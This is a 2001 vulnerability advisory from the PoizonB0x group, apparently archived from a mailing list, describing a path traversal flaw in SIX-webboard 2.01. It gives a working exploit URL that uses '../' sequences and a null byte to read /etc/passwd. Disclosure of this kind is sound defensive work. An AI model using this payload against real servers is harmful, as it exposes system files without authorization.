* a little bit late, but "it's better late than never"! *

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-
---------------

-NAME:
 SIX-webboard 2.01 "show files" vulnerability.

-DESCRIPTION:
 Little, but very popular webboard coded by Pipo
(webmastersixhead.com).
Find more information about the SIX-webboard here:
http://www.sixhead.com
or http://www.sixhead.net.

-PROBLEM:
 '..' and '/' are not filtered while processing user input,
so it is
possible to enter arbitrary values to retreive files from
remote sever,
which should not be accessible normally.

-EXPLOIT:
 http://www.target.net/cgi-bin/webboard/generate.cgi
?content=../../../../../../../../../etc/passwd%
00&board=boardsname
!The above line if given will output the file contents
of /etc/passwd

-AUTHORs:
 Discovery: digitalseed and k$en0r
 Advisory: digitalseed

-DISCLAIMER:
 PoizonB0x may not be held liable for the use or
potential
effects of these programs or advisories, nor the
content contained
within. Use them at your own risk.

-COPYRIGHT:
 PoizonB0x Crew - www.poizonb0x.org (c) 2000-
2001

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-
---------------

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]